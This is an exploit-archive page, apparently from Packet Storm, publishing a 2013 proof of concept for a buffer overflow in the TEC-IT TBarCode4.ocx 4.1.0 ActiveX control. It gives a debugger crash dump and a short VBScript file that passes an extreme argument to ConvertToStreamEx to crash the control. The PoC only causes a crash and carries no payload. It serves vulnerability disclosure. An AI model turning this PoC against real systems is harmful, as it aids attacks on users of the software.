what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

TEC-IT TBarCode OCX ActiveX Control Buffer Overflow

TEC-IT TBarCode OCX ActiveX Control Buffer Overflow
Posted Aug 1, 2013
Authored by d3b4g

TEC-IT TBarCode OCX active-x control TBarCode4.ocx version 4.1.0 buffer overflow proof of concept exploit.

tags | exploit, overflow, activex, proof of concept
SHA-256 | 9e7504858cd2b2e3b4c2b733618f991d98aa8fa02a48edb3d38372d57d04fb75

TEC-IT TBarCode OCX ActiveX Control Buffer Overflow

Change Mirror Download
# Exploit Title: TEC-IT TBarCode OCX ActiveX Control (TBarCode4.ocx 4.1.0 ) BOF poc
# Date: 29.7.2013
# Exploit Author: d3b4g
# Vendor Homepage:http://www.tec-it.com/en/start/Default.aspx
# Software Link: http://www.tec-it.com/en/start/Default.aspx
# Tested on: Windows XP SP3





Exception Code: ACCESS_VIOLATION
Disasm: 7785DFE4 CMP BYTE PTR [EAX+7],5 (ntdll.dll)

Seh Chain:
--------------------------------------------------
1 3C5744 TBarCode4.OCX
2 5AFCD959 VBSCRIPT.dll
3 778A71D5 ntdll.dll


Called From Returns To
--------------------------------------------------
ntdll.7785DFE4 KERNEL32.765614DD
KERNEL32.765614DD TBarCode4.3C0D31
TBarCode4.3C0D31 TBarCode4.39205E
TBarCode4.39205E OLEAUT32.76B83E75
OLEAUT32.76B83E75 OLEAUT32.76B83CEF
OLEAUT32.76B83CEF OLEAUT32.76B8052F
OLEAUT32.76B8052F TBarCode4.3BC65B
TBarCode4.3BC65B VBSCRIPT.5AF927E5
VBSCRIPT.5AF927E5 VBSCRIPT.5AF93737
VBSCRIPT.5AF93737 VBSCRIPT.5AF951AE
VBSCRIPT.5AF951AE VBSCRIPT.5AF950CA
VBSCRIPT.5AF950CA VBSCRIPT.5AF955A5
VBSCRIPT.5AF955A5 VBSCRIPT.5AF95951
VBSCRIPT.5AF95951 VBSCRIPT.5AF9417A
VBSCRIPT.5AF9417A SCROBJ.5ABD831F
SCROBJ.5ABD831F SCROBJ.5ABD99D3
SCROBJ.5ABD99D3 SCROBJ.5ABD986E
SCROBJ.5ABD986E SCROBJ.5ABD980B
SCROBJ.5ABD980B SCROBJ.5ABD97D0
SCROBJ.5ABD97D0 E140CD
E140CD E06B44
E06B44 E033B4
E033B4 E03189
E03189 E030FA
E030FA E02F93
E02F93 KERNEL32.765633AA
KERNEL32.765633AA ntdll.77869EF2
ntdll.77869EF2 ntdll.77869EC5


Registers:
--------------------------------------------------
EIP 7785DFE4
EAX 00000178
EBX 00000180
ECX 0038EB34 -> 0038F9B4
EDX 0045685A -> 00030000
EDI 00000000
ESI 005B0000 -> F9F249C7
EBP 0038E0D4 -> 0038E0E8
ESP 0038E0C4 -> 00000180


Block Disassembly:
--------------------------------------------------
7785DFC8 JNZ 77863481
7785DFCE TEST BYTE PTR [ESI+48],1
7785DFD2 JNZ 778642B3
7785DFD8 TEST BL,7
7785DFDB JNZ 778ADFE9
7785DFE1 LEA EAX,[EBX-8]
7785DFE4 CMP BYTE PTR [EAX+7],5 <--- CRASH
7785DFE8 JE 778ADFD2
7785DFEE TEST BYTE PTR [EAX+7],3F
7785DFF2 JE 778ADFE0
7785DFF8 MOV [EBP-4],EAX
7785DFFB CMP EAX,EDI
7785DFFD JE 778AE053
7785E003 CMP BYTE PTR [EBX-1],5
7785E007 JE 778ADFFC


ArgDump:
--------------------------------------------------
EBP+8 005B0000 -> F9F249C7
EBP+12 00000000
EBP+16 00000180
EBP+20 0038E130 -> 0038E4F4
EBP+24 003C0D31 -> 64F04D8B
EBP+28 005B0000 -> F9F249C7


Stack Dump:
--------------------------------------------------
38E0C4 80 01 00 00 C0 E3 38 00 00 00 00 00 00 00 00 00 [................]
38E0D4 E8 E0 38 00 DD 14 56 76 00 00 5B 00 00 00 00 00 [......Vv..[.....]
38E0E4 80 01 00 00 30 E1 38 00 31 0D 3C 00 00 00 5B 00 [..............[.]
38E0F4 00 00 00 00 80 01 00 00 C0 E3 38 00 B8 E3 38 00 [................]
38E104 00 00 00 00 00 00 00 00 4A 3C 86 77 33 00 00 00 [........J..w....]




+-- Poc


<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:2FD4F344-D857-4853-BC2F-88D5863BDB57' id='target' />
<script language='vbscript'>
targetFile = "C:\Users\Administrator\Desktop\TBarCode4.ocx"
prototype = "Function ConvertToStreamEx ( ByVal hDC As Long , ByVal eImageType As tag_ImageType , ByVal nQuality As Long , ByVal nXSize As Long , ByVal nYSize As Long , ByVal nXRes As Long , ByVal nYRes As Long )"
memberName = "ConvertToStreamEx"
progid = "TBARCODE4Lib.TBarCode4"
argCount = 7

arg1=1
arg2=1
arg3=1
arg4=1
arg5=1
arg6=1
arg7=-2147483647

target.ConvertToStreamEx arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7

</script></job></package>




-end





Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close